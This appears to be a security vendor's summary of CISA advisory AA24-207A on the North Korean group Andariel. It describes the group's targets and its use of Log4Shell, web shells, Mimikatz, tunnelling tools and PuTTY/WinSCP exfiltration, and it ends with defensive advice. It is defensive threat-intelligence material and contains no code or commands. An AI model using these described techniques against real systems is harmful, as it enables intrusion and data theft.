AdvisoriesCISAAA24-207AJuly 25, 2024
July 25, 2024
The RGB 3rd Bureau, a DPRK state-sponsored cyber group known as: Andariel, Onyx Sleet (formerly PLUTONIUM), DarkSeoul, Silent Chollima, and Stonefly/Clasiopa, targets defense, aerospace, nuclear, and engineering sectors to steal sensitive information for military and nuclear advancement. They fund operations through ransomware attacks on U.S. healthcare entities.
Initial access is gained through the exploitation of known vulnerabilities, such as CVE-2021-44228 (Log4Shell) in Apache's log4j to deploy a web shell, or via phishing. The group uses internet scanning tools and gathers open-source information to identify targets.
The group uses platform-native tools, such as netstat and WMIC, to reduce suspicion during post-exploitation activities. However, third-party RATs and other commodity malware is also deployed to achieve certain post-exploitation goals, such as enumeration, credential access, and data staging prior to exfiltration.
Data is then exfiltrated to cloud storage or other servers, often using PuTTY and WinSCP. C2 operations leverage HTTP disguises and tunneling tools (3Proxy, PLINK, Stunnel).
The RGB 3rd Bureau exploits public-facing applications by targeting known vulnerabilities like Log4j, deploying web shells for persistent access. Post-exploitation activities involve using RATs for system discovery and data collection. They prefer native tools for enumeration and use Mimikatz and similar tools for credential access.
Persistence is achieved with Scheduled Tasks, while packers like VMProtect and Themida help evade detection. For discovery, customized tools and SMB protocol are utilized. Data collection involves scanning for keywords, creating RAR archives, and exfiltrating data to cloud storage or servers via utilities like PuTTY and WinSCP.
Overall, it can be said that the sophistication of the group's attacks is not particularly remarkable. Targeting extremely well-known vulnerabilities and phishing for initial access, using mostly externally-developed tooling (as well as LOLBINs) for credential access, privesc, defense evasion, and exfiltration, all suggest operational pragmatism for the sake of expedience and a better ROI, rather than truly extraordinary technical capability and strategic profundity. Even so, such an attack was sufficient to compromise targeted organizations and make off with valuable information and data.
Organizations should enhance monitoring, apply patches, secure web servers, monitor endpoints, and strengthen authentication and remote access controls.
Be immediately notified of new advisories and associated security tests
